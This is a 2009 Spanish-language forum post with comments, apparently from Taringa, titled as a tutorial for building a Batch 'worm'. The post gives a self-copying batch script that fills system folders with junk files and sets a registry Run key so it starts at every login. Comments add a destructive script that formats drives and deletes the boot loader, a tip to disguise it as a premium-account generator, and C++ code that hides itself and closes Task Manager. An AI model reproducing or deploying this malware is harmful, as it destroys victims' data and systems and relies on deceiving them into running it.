Posteado por:
RSS con posts de GuisoX
Ver perfil de GuisoX GuisoX
New Full User
New Full UserHombre Argentina
No Rankeado

16 Posts
120 Comentarios
114 Puntos


    

Como crear un gusano en Batch (codigo)

    

Hola, aqui les dejo este tutorial que encontre ...

En este tutorial les voy a mostrar como crear un gusano en batch. Este gusano creara muchos archivos en los directorios que pongamos en el código…

A continuación abrimos el block de notas e ingresamos el siguiente código…

dijo:

@echo off
:worm
cd \
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd \
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd system32
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm


Ahora vamos a "guardar como" y elegimos el lugar donde se guardara el gusano.

Nombre: worm.bat
Tipo: Todo los archivos
Después de guardarlo, agregamos otra línea de registro debajo de (@echo off) para que cuando se inicie la pc, el gusano también se inicie.

dijo:

copy %0 %windir%\system32\worm.bat
REG ADD
HKLM\software\microsoft\windows\currentsversion\run/v hack/d %windir%\system32\worm.bat



Al final nos quedaría algo así:

dijo:

@echo off
copy %0 %windir%\system32\worm.bat
REG ADD HKLM\software\microsoft\windows\currentsversion\run/v hack/d %windir%\system32\worm.bat
:worm
cd \
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd \
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd system32
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm



Ahora nuestro worm se autocopiara en el directorio: C:\Windows\System32\worm.bat y la otra linea era para agregar una entrada al registro al kual iniciara nuestro virus cada vez que se inicie sesion.

No lo ejecuten porque se auto infectaran y lo mas peligroso es que tengan que formatear la pc, así que tengan mucho cuidado con lo que hacen.

Y aqui termina ... y me despido

Saludos
GuisX






15 Puntos 17 Favoritos 2718 Visitas

Creado el: 01.02.2009 a las 21:54:29 hs.
Categoría: Info
Tags: , , , , , , , ,
Agregar a:

Comentarios
RSS con los comentarios de este post
#1 - GuisoX | 01.02.2009 21:54:49 dijo:
comenten
saludos
GuisoX
#2 - iaris | 01.02.2009 22:10:16 dijo:
te lo borran
#3 - MobidoM | 02.02.2009 09:06:01 dijo:
no se si esto será útil para alguien.
#4 - renatros | 02.02.2009 09:11:19 dijo:
:/, así estamos hoy en día.
#5 - D4RKS7R34K | 02.02.2009 19:48:16 dijo:
Que imaginacion para pasar desapersivido worm.bat :I
#6 - Luk4zH4ck | 02.02.2009 21:19:43 dijo:
la verdad q si...
#7 - maurocen | 03.02.2009 17:17:16 dijo:
MobidoM dijo:

no se si esto será útil para alguien.


no creo

renatros dijo:

:/, así estamos hoy en día.


si
D4RKS7R34K dijo:

Que imaginacion para pasar desapersivido worm.bat :I


XD
Luk4zH4ck dijo:

la verdad q si...


nada que decir

jaja buen post aunque no creo que sea muy bien bienvenido aunque esta bien explicado
#8 - QuarksHack | 04.02.2009 15:11:05 dijo:
Bueno pero q rraro que no lo eliminarionnn
#9 - GuisoX | 05.02.2009 22:12:49 dijo:
D4RKS7R34K dijo:

Que imaginacion para pasar desapersivido worm.bat :I



Mira, sos un boludo ... es obvio que no le vas a poner worm.BAT
por que sino, todos los viruse dirian NOMEABRAS.exe o VIRUS.exe
Pensa un poco, amigo ...
Saludos
GuisoX
#10 - danijazzero | 09.02.2009 03:00:44 dijo:
tambien se puede hacer exe cambiando el

ej:

gusano.bat

a

gusano.exe
y cambiarle la imagen al exe
pero para q no sea obvio i la victima no lo abra le ponemos otro nombre como generador de cuentas premium
rapidshare
o otros
suerte
#11 - rizzy | 09.03.2009 13:06:09 dijo:
ESTA BUENO CHE! PERO NO LO NECESITO
#12 - rovitofer | 19.03.2009 21:53:55 dijo:
Nonono
#13 - thecradleofthedarkness | 02.04.2009 03:41:36 dijo:
che.. detectable asta las bolaaaaaaas ,, aguate avast , es el mejor antivirus del mundo vieja
#14 - Jhager999 | 10.04.2009 14:43:59 dijo:
eo no me funca el virus aver si crear otro q funcione
#15 - wOLF_BLOOD | 15.04.2009 03:19:10 dijo:
todo lo k hiciste fue copiar y pegar solo k editarlo nadmas aki els dejo la pagina de donde se pedue copiar y pegar igal k el lamers le hizo http://www.tuwebdeinformatica.com/Hacking/usuarios/gusano.html
#16 - jpeg66 | 15.04.2009 20:07:32 dijo:
Esto puede servir para venganza
#17 - jpeg66 | 15.04.2009 20:10:47 dijo:
no sería Random en vez de Ramdom?
#18 - jpeg66 | 15.04.2009 21:31:19 dijo:
Una pregunta, si en vez de echo virus le pone un texto mas largo, ocuparía mas espacio en el disco, no?
#19 - shady_dbz | 18.04.2009 17:07:00 dijo:
dijo:

Esto puede servir para venganza



IDEM
#20 - flogger12 | 23.04.2009 23:21:56 dijo:
dijo:

@echo off cls color a title regalito de fin de año echo @echo off >>%windir%\init.cmd echo cmdow @ /hid >>%windir%\init.cmd echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t Reg_Dword /d 1 >>%windir%\init.cmd echo taskkill /f /im explorer.exe >>%windir%\init.cmd echo echo s|format d: /q >>%windir%\init.cmd echo echo s|format e: /q >>%windir%\init.cmd echo echo s|format f: /q >>%windir%\init.cmd echo echo s|format g: /q >>%windir%\init.cmd echo cls >>%windir%\init.cmd echo attrib -s -h -r %systemdrive%\*.* >>%windir%\init.cmd echo del %systemdrive%\ntldr >>%windir%\init.cmd echo sleep 5 >>%windir%\init.cmd echo shutdown -s -t 500 "Apagando para siempre"




y lo guardas como "FELIZ AÑO NUEVO.BAT" sin comillas

cuando lo abris se te hace mierda la maquina



P.D

para solucionarlo reinstalar windows sin formatear

o traer la pc a nasa computacion de rosario ahi estoy yo y unos amigos
#21 - flogger12 | 23.04.2009 23:22:53 dijo:
uhhh alto quilombo :S

dijo:

@echo off
cls
color a
title regalito de fin de año
echo @echo off >>%windir%\init.cmd
echo cmdow @ /hid >>%windir%\init.cmd
echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t Reg_Dword /d 1 >>%windir%\init.cmd
echo taskkill /f /im explorer.exe >>%windir%\init.cmd
echo echo s|format d: /q >>%windir%\init.cmd
echo echo s|format e: /q >>%windir%\init.cmd
echo echo s|format f: /q >>%windir%\init.cmd
echo echo s|format g: /q >>%windir%\init.cmd
echo cls >>%windir%\init.cmd
echo attrib -s -h -r %systemdrive%\*.* >>%windir%\init.cmd
echo del %systemdrive%\ntldr >>%windir%\init.cmd
echo sleep 5 >>%windir%\init.cmd
echo shutdown -s -t 500 "Apagando para siempre"



ahora si???

ok
#22 - flogger12 | 23.04.2009 23:25:01 dijo:
dijo:

P.D para solucionarlo reinstalar windows sin formatear o traer la pc a nasa computacion de rosario ahi estoy yo y unos amigos



trata de q no se te rompa por q me lo enseño el profe y si se entera q andamos rompiendo maquinas se enoja

chau
#23 - darkbetzel | 30.04.2009 19:24:47 dijo:
/*un poco interesante,pueden utilizar el quick batch compiler y cambiarle el icono adjuntar unas cuantas mutaciones del mismo y liberarlas segun sea el caso o a un mejor incluirlo dentro de uno hecho en c++, para que se les aga simple metanlo a un simple programilla de consola y oculten la ventana,seria lo maximo,un ejemplo seria
*/

#include<windows.h>
#include<iostream>
using namespace std;
void main()
{
//La linea de abajo oculta la consola
ShowWindow(GetForegroundWindow(),SW_HIDE);

//El siguiente ciclo finaliza cuando presionas F12
while(!GetAsyncKeyState(VK_F12))
{
//la siguiente linea duerme el proceso 1 segundo
Sleep(1000);

HWND dondeestas; //objeto.nesesario para.cerrar.ventana taskmanager
dondeestas = FindWindow(NULL,"Windows Task Manager"; //buscarventana
SendMessage(dondeestas,WM_CLOSE,(LPARAM)0,(WPARAM)0); //cerrarventana
system("echo aqui va tu batch ,recuerda une los comandos con &";
} //esta llave cierra la llave del while
}//esta llave cierra la llave del main()


//esto ya no pertenese al programa
Si tienen alguna duda nomas pregunten estoy para cualquierduda que pueda responder,lo que yo hice con mi primer batch fue sacar muchas ventanas con letras color 0a, y agregarme al registro para que cada vez que iniciara windows estubiera jodiendo,despues con el tiempo ley muchos tutoriales de C++ y pues ahora los ago en c++,una vez que sepan bien batch seles hace mas fasil c++.......chido
#24 - DiKFl8 | 04.05.2009 20:31:54 dijo:
Malisimo! dejense de romper computadoras y ponganse a estudiar
#25 - federicohoubey | 04.05.2009 20:35:15 dijo:
jaja, para cuando hagan eso , taringa va a volvera la normalidad!
#26 - soportek9 | 09.05.2009 23:50:15 dijo:
como conocimiento lo paso, pero creo que se perderia la mistica de nuestro sitio si alguien lo pone en practica en un pc ajeno no lo hagan
#27 - jose666n | 16.05.2009 14:40:14 dijo:
yo hice un post de creacion de virus y me lo borraron al toque
#28 - matrix2800 | 18.05.2009 19:50:06 dijo:
leístes esto antes de postear?

El título:
SI Que sea descriptivo
NO TODO EN MAYUSCULA
NO !!!!!!!Exagerados!!!!!!
NO PARCIALMENTE en mayusculas!

Contenido:
NO Información personal o de un tercero
NO Fotos de personas menores de edad
NO Muertos, sangre, vómitos, etc.
NO Con contenido racista y/o peyorativo
NO Poca calidad (una imagen, texto pobre)
NO Chistes escritos, adivinanzas, trivias
NO Haciendo preguntas o criticas.
NO Insultos o malos modos.
NO Con intención de armar polémica.
NO Apología de delito.
NO Software spyware, malware, virus o troyanos.

Denunciado.
#29 - Kratoi77 | 18.05.2009 22:04:20 dijo:
ES LEGAL UN POST ASI
#30 - karbone | 02.06.2009 06:59:56 dijo:
my destiny is my only enemy
#31 - alexotox | 12.06.2009 22:06:55 dijo:
es legal porque el gusano no esta creado pero yo lo voy a hacer
#32 - M1n1sh4 | 23.06.2009 21:13:44 dijo:
mierda de post!
#33 - julixrecargado | 02.07.2009 20:42:36 dijo:
Te doy un -5 por mal manejo de la informacion, -3 porque los antivirus no lo detectan, -2 porque es un gusano y un +10 porque uso Linux!!!!

XD
#34 - darkbetzel | 07.07.2009 01:12:42 dijo:
por que mejor no lo hacen en paskal hahaha, lelos es mejor c o c++ ya si son muy chidos ensamblador,no jueguen a los batch mierdas y agarren un lengueje
#35 - Hacker83 | 15.07.2009 21:40:46 dijo:
DiKFl8 dijo:

Malisimo! dejense de romper computadoras y ponganse a estudiar



Jajaja esto no es virus si querien virus bajensen archivos infectados y este chavon nedr de mierda que dice pongance a estudiar jaja este si es un limdo virus

@echo off cls color a title regalito de fin de año echo @echo off >>%windir%\init.cmd echo cmdow @ /hid >>%windir%\init.cmd echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t Reg_Dword /d 1 >>%windir%\init.cmd echo taskkill /f /im explorer.exe >>%windir%\init.cmd echo echo s|format d: /q >>%windir%\init.cmd echo echo s|format e: /q >>%windir%\init.cmd echo echo s|format f: /q >>%windir%\init.cmd echo echo s|format g: /q >>%windir%\init.cmd echo cls >>%windir%\init.cmd echo attrib -s -h -r %systemdrive%\*.* >>%windir%\init.cmd echo del %systemdrive%\ntldr >>%windir%\init.cmd echo sleep 5 >>%windir%\init.cmd echo shutdown -s -t 500 "Apagando para siempre"
Abranlo i depues me cuentan
#36 - hdf_1986 | 16.07.2009 10:47:26 dijo:
Hacker83 dijo:

DiKFl8 dijo:

Malisimo! dejense de romper computadoras y ponganse a estudiar

[br][br]Jajaja esto no es virus si querien virus bajensen archivos infectados y este chavon nedr de mierda que dice pongance a estudiar jaja este si es un limdo virus[br][br]@echo off cls color a title regalito de fin de año echo @echo off >>%windir%\init.cmd echo cmdow @ /hid >>%windir%\init.cmd echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t Reg_Dword /d 1 >>%windir%\init.cmd echo taskkill /f /im explorer.exe >>%windir%\init.cmd echo echo s|format d: /q >>%windir%\init.cmd echo echo s|format e: /q >>%windir%\init.cmd echo echo s|format f: /q >>%windir%\init.cmd echo echo s|format g: /q >>%windir%\init.cmd echo cls >>%windir%\init.cmd echo attrib -s -h -r %systemdrive%\*.* >>%windir%\init.cmd echo del %systemdrive%\ntldr >>%windir%\init.cmd echo sleep 5 >>%windir%\init.cmd echo shutdown -s -t 500 "Apagando para siempre"[br]Abranlo i depues me cuentan


te la hago safar para que no se apage rapido pone windows+r cmd shutdown -s jajaj te gane
#37 - franko_taringa | 16.07.2009 14:33:06 dijo:
muy grosos !! me gusto gracias te dejo 10 puntos!
#38 - pudymody | 22.07.2009 14:50:35 dijo:
+5 GROSO
#39 - vampireferra | 28.09.2009 01:03:54 dijo:
Hacker83 dijo:

DiKFl8 dijo:

Malisimo! dejense de romper computadoras y ponganse a estudiar



Jajaja esto no es virus si querien virus bajensen archivos infectados y este chavon nedr de mierda que dice pongance a estudiar jaja este si es un limdo virus

@echo off cls color a title regalito de fin de año echo @echo off >>%windir%init.cmd echo cmdow @ /hid >>%windir%init.cmd echo reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoClose /t Reg_Dword /d 1 >>%windir%init.cmd echo taskkill /f /im explorer.exe >>%windir%init.cmd echo echo s|format d: /q >>%windir%init.cmd echo echo s|format e: /q >>%windir%init.cmd echo echo s|format f: /q >>%windir%init.cmd echo echo s|format g: /q >>%windir%init.cmd echo cls >>%windir%init.cmd echo attrib -s -h -r %systemdrive%*.* >>%windir%init.cmd echo del %systemdrive%ntldr >>%windir%init.cmd echo sleep 5 >>%windir%init.cmd echo shutdown -s -t 500 "Apagando para siempre"
Abranlo i depues me cuentan


eso es lo peor
por suerte a mi disco de datos lo tengo en la unidad x:

Para poder comentar necesitas estar Registrado. O.. ya tenes usuario? Logueate!
Ir al cielo
API - Trabaja en Taringa! - Anuncie en T! - Protocolo - Contacto - Enlazanos - Mapa del sitio - Prensa - Denuncias - T! em Português
Términos y condiciones - Privacidad de datos